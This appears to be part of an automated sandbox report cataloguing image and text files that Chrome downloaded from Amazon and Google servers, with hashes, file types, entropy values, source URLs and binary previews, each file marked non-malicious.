                                                                                                                                                                                                                                                                SHA-512:7A9F4255D327194CD890503FD1F5901008EBAE5F8A7B1043CA2C258E1373B61C43DF8E48B27413E26A6F947F8EFC25C4520761C2099ED58EC6D038B33FA8F88C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X..........$.'^.....zB.X..hO.....!..h.E....=.y..{d._\...N......q......................C...k.0=-.\M.#.%.....bH...?.I^..,...zE.._....G'7+r..y..4.<..<..1C.K..H=/..4=U..........................<.....P.E.AS...R....wz..N..'D.._.Y:W.K5.>.S.W%...@.9..XrjI#.).*.|Q.\.D...IY,b....u&1.k.zw..=.............x...(a.....WG...2.i.?8.....'....u.l.sP....M.,.j7s...q.Q5F......I....3............w.............y..~..l..*Gc...../...%h...)9@e..E.'w..,..rc.ji..4MT.\..,.M...F....U0.}..}fX...w.............ys.......lp.......=G.B.I.#$...E......v...g&.o...jj....}NQ..@..9n7A...d;..n.-................u...<./.eNU.L. ...)..Et.(8@c.....o..,'M..3.=w..J.3..y$Jw...n.q$Vn&.7..5VDG}7/................*........|..}(`|.........T.B%5....r.b.x....ze...m.i.A%...:..'8.M.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1747
                                                                                                                                                                                                                                                                Entropy (8bit):7.319021307352595
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6YmDoPHULh4io+QrTrZIwX0J6TNi5gi+h:TQYk0eizGTrJ02i5giE
                                                                                                                                                                                                                                                                MD5:2067313B03F9CDBA065DD9BC150A5F1C
                                                                                                                                                                                                                                                                SHA1:E744B11069A7F7C52C68F19D1EC1C6DDC9D3D842
                                                                                                                                                                                                                                                                SHA-256:B0581F5C40A58668563495C5E94071B0A0B81D22A8C8275760E08B53E1665CCB
                                                                                                                                                                                                                                                                SHA-512:51B50F54F8319F394A39AEC1CDA543CFDC688304800436245D45DC2DE1CD7A8C51B2E7D0315964641B40798710EA20DEFD1AB55652CCA42204D5D8D7A9614F8C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!1A.."2aqQR....Bbcr.s.................................................!..1a.A.234Qr.q............?...............o..._S..%._.}]..9<.I6..t..|.R.U..v.Z..m..GM..$hg...4.KZ.J.m...j_bE........V.4.n..?*l...mO...)QQ.K}..Z.SvM.K.l.'..UV..1..;.jR.Wn.\rf..e.-.N.....;...u.......l|.U{...4...~.Kn:6.D.qs.*..bb=.1].4..i...A.....................-y'g....c.M.V...2J..]...-..QT:.ekEeY........f.J.</....qjI5....9...G[..T.7...................................<.Q.B..Q.R..M....&..d..I[M....}/.....f.T.Rr.q...;GJ....E..n1o.....z..<.}...UG.k.0.t..........................x{.%O.(...E..:i.$..Q.C....y......................................e|.......E..7..R.Ri3*....."q.^y...G/......pj....................(...\/.|Y..JO.7.ui.U.....9..-N.F.S0}....%.1.........4..O.Z.#.M'
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 1242x450, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):86211
                                                                                                                                                                                                                                                                Entropy (8bit):7.974143822266519
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:yGyq6XHCrUIP2ExfMmBehopMLuOop23L2rWAHHfpCIrFkUGHXLMkXlWdERxT4Rl:+q6XCrEECma/op+L41MI3WoulWKRxT4X
                                                                                                                                                                                                                                                                MD5:5382EF236633101B41E2E4D95E49B378
                                                                                                                                                                                                                                                                SHA1:D7542A4CABA64D136966556519CDF55C48B40805
                                                                                                                                                                                                                                                                SHA-256:64949412670AC16289D60E3BDA56DB633D948DC22B088F6974D0C1836173E3CC
                                                                                                                                                                                                                                                                SHA-512:1847C9C69F26E614E6A2A455798F3FD88A443784BD2D0480DE7B3A089A401C96CEFB8F5EF62AD29F84FF7E548DA274B47A2CF15C8E3079623CAF8D76DDB1D184
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/grocery/SSW2022/FEB/AE_MH_CN_HealthBeauty_En_1242x450.jpg
                                                                                                                                                                                                                                                                Preview:......Exif..MM.*.......i.......................~...({"systemName":"Freeway","id":"XCM_Manual_1333288_AE_MH_CN_HealthBeauty_En_1242x450_a2eaceef-6c79-4ff7-852e-75bfa7e807e9.jpg"}.....Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6698c714-4270-4d04-aaa6-be4b260bfa70" xmpMM:DocumentID="xmp.did:9DB3D66EB67F11EBB17BEC042ECF912E" xmpMM:InstanceID="xmp.iid:3BA5DCDEB67E11EBB17BEC042ECF912E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3e68cfa7-75f6-440c-9418-8b8e0eef8065" stRef:documentID="adobe:docid:ph
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2879
                                                                                                                                                                                                                                                                Entropy (8bit):7.84869020928119
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rSwGRZE+uy+60RskHbD0nHftIC38TSz8rWJYJmJZXZFV06Cp1l5Q1aoJLASo4:TsGDE+s6YbD0nqzTwH6JmJZp3fC7lUp7
                                                                                                                                                                                                                                                                MD5:59843D94DB955D9F79A7795A4D5F4E9E
                                                                                                                                                                                                                                                                SHA1:EE36D09FBF049023BBB8BA166CCE803C7D28DB18
                                                                                                                                                                                                                                                                SHA-256:39AF25E367EA661C64A284977B00021421925FDB168268883C51CE0F04732BC1
                                                                                                                                                                                                                                                                SHA-512:91EF428F678B211169C99DF8FB2454F37993537587FDCABC1C6A2433B4C4394FD94D4BA425F9D6F1FC97E67F83234331C1228502BA09E34729337C2EB6FFB0D4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1."AQ..q23Bab...#R...S.................................................1..!"Aa............?....(..(..(..y...@k...y.E.`w.E......K..[T.... ..H.e.....i.{..?............F......z.".l.t.{w.O..y..JH.u..................5....Ksr.8...........Y.Jt.\..O#l.#..r..$j....TO.u.uk.&......~K.q.;"...5..<x|......].\.w.y....F..'[.a/)...................l~..E.ku*f5$A.y....vf?N{.B.Oe.......Y.....c.8...k|jwVV.V...j......d..tl..............m.......4....s..+.......{5X/..lz...o....."^........}....].........uu.X.8l..#.}.W.....{.8.5..V....P...Y..L...f..5.%)J.)J.)J.)J.EV/..Eo.....,!.....>.?......xi.f.8y...H. {.!.z.U.G.V.u..YL.-...x].....B3R#..k.E..L...Q@ER....*..l.y.;.w/.I!.6`......9..GP].....p..=...#?..7.k\..5....]I0.(`b.pe..fX.}.M....N.+....4.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/01/msa/vowels/metrics._STID621445-1723469054818_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1500x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):93200
                                                                                                                                                                                                                                                                Entropy (8bit):7.964613794669333
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:J+KMLkSQL18z2bm6y5iNp2SqeGgQanZPanCibL8SXIDFTGe7/BH2I055mdmIAVVx:kKFxuz2gSp2IGCisYIDRGei5wENLEM
                                                                                                                                                                                                                                                                MD5:950E92CD333957EA6383FF034FCDEA89
                                                                                                                                                                                                                                                                SHA1:E0452ADE87A7E6883A23D1EB3DF8973290545F99
                                                                                                                                                                                                                                                                SHA-256:CDE67805D04D7D953414011EAD65AA8AA4855D4304057309AEF3A203D2054399
                                                                                                                                                                                                                                                                SHA-512:D0A35F96EC44D68BEFD216777CAADB942A47C11ABB2DED68009A2A640A497E540E60E1FE57CBF167B83FC98DB905EF42BC3C176EFB002263F664BCAB84890171
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/consumables_uae/SnS/Updated_AE_ATF_CN_ProductsAutomatically_1500x200_en.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF.............C....................................................................C.......................................................................................................................k............................!..1A.."Qaq...#28Bv....79Ru....$3Gbrt....&6CVs....5STcw.......%4....(DHdef.....................................S.........................!..1A.Qaq."2r......45...#3BRbs......C..DS....$6Tc..&7t.%............?..b...{!;.....D.Q...TD..(.|..y.T.%.6.&..*..TU(.E.....(.xQD...T.%.(.DJ(.U(.Q..ES..(.(...ER..:"Q...>.Q(..EP.E..q.DJ*.Q(....(..DJ"..E.....D..DM.xQT......(...*..*.QD..DO>.Q(.QD.%.M..D.%.(..*.D..QD..DJ(.U>...."|..DO*(....(...(..'J"x.D.&.D.'...<~tD.%.J*.6....DO."yQT.....4D.'..O.*.D.&.%.J(..DJ*.."."....(.DO..(..DJ(....'..J"Q.j"mQ....ER..Q(.."...M..].J"Q...D..ER.%.>tU:......:(..U(..%.(...E...tU..\...TD..E....*.Q...TD..~.Qph..DO....J".....E..ES..DJ"TD..DO..<(.}(.Q...E....(.DJ"oE....e....#.NHY.B....z...M....d....[jm..p..lJN......'Fl.A......v
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):14535
                                                                                                                                                                                                                                                                Entropy (8bit):7.879436571334247
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:yJTbBqd41qycOfMACm+Ndq2f5zog1yPCsVasjCCML8OwKQ+:yJTbV17cO+84eNwsjCdLo+
                                                                                                                                                                                                                                                                MD5:CB57C5063D4D6A58113CA014E0CD4A68
                                                                                                                                                                                                                                                                SHA1:28057B6E3C95708FE4C43D83CC0EF15473E3A8A4
                                                                                                                                                                                                                                                                SHA-256:A81C85E7996BC6D75C2535B24B65C9E667FA538A6E426BD8B0CC5AB833F1188F
                                                                                                                                                                                                                                                                SHA-512:ABF7A687B5C7D47C0979BFADEC367F49E63F18BCB0032B264AF1249F2916D7FEFA837AAD5E7DA6FB1DA5AA9DC699DBDB311DA5785004A809002A3A8F1D1B013A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a2.2..........]...........:....................................{............}..............u..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.14ecb42f2c, 2023/01/13-12:25:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db" xmpMM:DocumentID="xmp.did:384E825BB64F11EDAC9EB44161D1C413" xmpMM:InstanceID="xmp.iid:384E825AB64F11EDAC9EB44161D1C413" xmp:CreatorTool="Adobe Photoshop 24.2 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b5fda8ec-2814-4cb6-8f13-b3de686f05db" stRef:documentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):81490
                                                                                                                                                                                                                                                                Entropy (8bit):7.8807575810860895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:4/gPkWhnjNjfqfoEB5wxVHfSVxUkevKZ0oietioXGpQBjFVDEbn:4/gPLnjhzE8sVxyvQ0oBtioXDBjFon
                                                                                                                                                                                                                                                                MD5:5157474C81813C728DEB1AF9FCE0942D
                                                                                                                                                                                                                                                                SHA1:F5A1CE5823CC1C81DA1E7AA543E01D95AF33148A
                                                                                                                                                                                                                                                                SHA-256:380EE7606C2D3F001739629BB6443F7C43E02E2FABEFC6D1BA1E9B6774419BED
                                                                                                                                                                                                                                                                SHA-512:61297E7C38D3CADB6D77CD7C2ECB8160588D56FFF75C574497FCD2973A9A155393D48D5F0B8866128FB13D2F15E6FE881B485C67E0C9BF65CBBE9E6BAA851211
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 164x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6823
                                                                                                                                                                                                                                                                Entropy (8bit):7.93607835994362
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:d/moCg5PoiGfwAi0NKkBR+0W6w8BwbN9jU4y:d3CUPoimNDBR+FLN+h
                                                                                                                                                                                                                                                                MD5:DEA74BEE70D7FDC4E685F66CA9AEE1E0
                                                                                                                                                                                                                                                                SHA1:5E96BED8EF5B0B91BB4B2D9438D56A58EFFB7951
                                                                                                                                                                                                                                                                SHA-256:010D995D245867CBB2F7EE122CEAEF72295263382B5BFEEF559ECF64B6DDCE96
                                                                                                                                                                                                                                                                SHA-512:D49AEEE99457BF9B507C05C30C27608B084CD027101F160F3A514BC29EB8FC968DAB392DC46A61D6E8D89A1A1FD21B2091C125596578F4DD54D473A4A209092A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61uHnzEtCWL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..Q."Aq...2Bas......3Rbrt.#.....$%5DESTUu..Ce..................................................!Q.............?..t...>M*.{......y...az....z.}..j.....I..u$...G..u{iu..h..W..........{..z.G.=ch4.....Q..'..,..r...1...e...N...W...{O..l?.....sv......1.,.)..wa.=..1.UI:....o..s..&{...~........g.J].>.gA...X..4.p..E..J..sp:.~.....k...j.p....P..*{Yk..i....E.......OC/..5..G....Y......M]~....w,.G.S.5%.T.K...6.p...C....O.&......zU.v..yl.,Nq.v....\.1.U..3.T.. .^Qp..{.C.;.2.D^..*.}G5....f..E...R.....G.z(.QE...Q@QE...Q@...H..N^..yq.....]..+..7..W...ao%...xVM...S..v...5}...+.F.;..P...-..`NT..7O]U.(.Tf..{.$.>.<..N7...9..........Hqu. ,.......Q.....q>...[.\......r.....Z.eR....XS....a./.9.;...M.o0.Y.{(..G\.,.I..r...`<J...]n....6Iqv....(3...Is.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):59849
                                                                                                                                                                                                                                                                Entropy (8bit):7.9719454048172675
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:AV/K8PMmwETLFFJn2vkNrgVmZIud0DSnZSe7+P:G/KQwETLdnW8rgVK0Dk8e7+P
                                                                                                                                                                                                                                                                MD5:987E3DDAC3D34C5724954BEFFD75D52E
                                                                                                                                                                                                                                                                SHA1:884F33C5CE2BE7E8B52CAC1311B89E138C378AE7
                                                                                                                                                                                                                                                                SHA-256:9BA31014F9F97F405BCD46F9EA2CC124F7EEDDB7E0FE7AE579C37F5099C50D30
                                                                                                                                                                                                                                                                SHA-512:973057698AF356A56D1BB6CE83797EF91FB76AB5E941014640058108BCFD269C0006A9866B2D0D7DEC7096531F2076135CEDC68D8D09B479E61C87AF29E2C5E8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................<..................................................................................X..0...@.WoQ.....q..g.>?uK.....}[...&.Y?0.....................X{.dX......yG.........^..r...BJ.C.s.:................Q."...s.I.w8..........3;.I.s............<~...!....^.............d.h.$.............:V?..v.ef .9..........e.....u...........2e....Y..}...........R...;'.r.M.@.........47.R?........q.-<#vQz_goA.S:.K."...B.hX...?....Z..3}y|.?y|...8K...@.....Y..-.a............~.G...ox.)Y.w.-........... |...}U...o.0...K)....#H....D./"!...........?....].sgF?./..........W........Pd...E.y.i>p..&,.S.uG`...#.Y.P.Yr..............B.b.-/.:.f...,p..')XVG.p..........F.....@....}..&H.M.@..:.4.+#Ps{..{........]}.....v.l.V.v9.F..O....}.k...........!...B..}.B....0.....Y..8.._ .......4...=.>.W`.>.6...2|..xd...}.&.e...y.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):76044
                                                                                                                                                                                                                                                                Entropy (8bit):7.885401691926046
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:xsQrxRRCKw65W0zlDvKbU2w+ZRJkZORGA5q8+Uwb7f2VCxm:xsuBCKB4iUvwiJ1Gy+Uwb7fO/
                                                                                                                                                                                                                                                                MD5:796DDD9242D15A87E699D2F5BD82A282
                                                                                                                                                                                                                                                                SHA1:C8C1DD9E09200645BB8E31D6C5521825046B67EE
                                                                                                                                                                                                                                                                SHA-256:FAF5A34430E05E3E5D0CEADEAEA5E990E5E88453C253380D435BDB7914532118
                                                                                                                                                                                                                                                                SHA-512:AE8DB35D5683DC0A758611BD5E39C4038AF63C48CDBFC83E2A670407842001DD06A975CD8EEF000F7D7387398332DCC641D3CAB4ED9DD1406283F00F4D80D386
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61xIrwwZU0L._SX1500_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................X...............7......................................................................i`.....................................B...............R.....b..!N.?K.z...FC"..(.R.U.ft.-.2...Q.U.s...........................................b....B.....@PbP.......1)....w.-7{....S+....a..*.)r...R.a...@...................................................Pb.R..........A...z..[......@.V.ZY.r..e2.[.qT.K.9..;c..........................................!..@.).T6Y.vr...........1(.... (...nN.....r......Z....UrH.(.dR..pe..\.^...............................................~....;'9.08...:&...\....-..9......0...@R.P.b.R...j.^_.....Ql.QY.U..ZE...E.Q...R.r.z.;b........................................~[.o.....A.```q..?.3/.&...|p.(.(..........C........-s_..,...VT..-gJ...)FR..ee.r..o;a.......................................~`.o........,._..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7620
                                                                                                                                                                                                                                                                Entropy (8bit):7.90492341379653
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:gQWbAlpz8WpQJYcTArsj+g92iR+LDQPJ1:pnz8WpQemHjd92iUu
                                                                                                                                                                                                                                                                MD5:C869A4B0C9507B4A14DA4F13290C6987
                                                                                                                                                                                                                                                                SHA1:0B6D7875E332B9F13FA457B117B27FDF88646C69
                                                                                                                                                                                                                                                                SHA-256:FE3FD80964182C3B78CE779EEC8B9A280FC45D38E9473969E65795E29566E22F
                                                                                                                                                                                                                                                                SHA-512:308D5CFC8616D9A69A62E0BC07B45A847D9EF7105A1CFAFA6AACD256027017D1DC7FDAF4EC39CFEC03D247B2B39C2CD81CD4D6B5D782B64600ABC05307FF9FD6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41gRz4miKkL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................`....#.M.e........HJ....=..Z..2./...B...P..jW'..t.......yp.>kht3..vq!)......\.C.1... O......N...!Q...\..z.....Ph.N....|.MX-mZ...f....P.^.F.u.q.Q1TL.~..n#)(.......QG"...*3.dS..^.....o..R(.....jFYD.....~....4..........m..>....M9....-.%'g}..|.M.h.>t*]wIV,..1.F.Rt...........+.G..Y\!gp....F y.{.w8.......h...'O@......Q........\.L........w.}E........L<............<)..z5...........pG!...E.dM.W...9..7w.....X.i..R%.o.......<5..9..IG....y.|C....F.R...D..ek.n.e!.\....U.L....6...x....%B<.KL.B}...^.........Co&..%Y........ui....Q.L.j'^......Ys.......E....Y.....v....u..^q7\......:..h..l.....4TN....u.V........b.7.T..f<.s4E...1*B...!..N.. .h....8..2z..c.EKP...!......t..H..B3q.m.R..5n.G.6....9..;.gX...I...|U....Gze.R.&...O.I.x
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):28
                                                                                                                                                                                                                                                                Entropy (8bit):4.066108939837481
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Q3S1lnyY:QC1lnL
                                                                                                                                                                                                                                                                MD5:C2123D55130F2FA8031FE9BFFF36E675
                                                                                                                                                                                                                                                                SHA1:B1F9FA4201BBA320891B92428E08EBDBE97F281A
                                                                                                                                                                                                                                                                SHA-256:C456CA51EA843B4E09F6102F892EF409440A5C3C3615821B2586EEAD2F680506
                                                                                                                                                                                                                                                                SHA-512:C962FF1CF2655106BE8456A80B945BFFE9EEFA29224684FA8B68FC8AA0364DADE034FBFF426BF48F8E2C0652F596EF47AFEE2129E40D995CB2B73F1109B13ED9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmsilr5PRTcwRIFDb1LTuESBQ1IOj9B?alt=proto
                                                                                                                                                                                                                                                                Preview:ChIKBw29S07hGgAKBw1IOj9BGgA=
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 224x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6834
                                                                                                                                                                                                                                                                Entropy (8bit):7.94697637872233
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:MvivzvVVhInneyIl8SPo3843SOXOqS4/l6NuT+NsUwr0f+X:MvivbVoneVFz4iOXOb66NqDUSxX
                                                                                                                                                                                                                                                                MD5:2C61A6230D4313F6147302F6F5532E12
                                                                                                                                                                                                                                                                SHA1:79FC3C1183A61AF2E50FF8EDD806C4AC2039CB74
                                                                                                                                                                                                                                                                SHA-256:3E3693A81E3F8483C95A0B941CBDBAEE966AB79D27A477740325BB2F3E400AD8
                                                                                                                                                                                                                                                                SHA-512:B61B2AF571A0D361E3C26579A88D7957993EF73CCD0CE65FF1F1A3F36C8498D4DFE0C626FDC0F25E310CEF3E94DD02296F98B8B3E0164F06AB8F59FD300885D5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/619pZrUnkWL._AC_SY200_.jpg
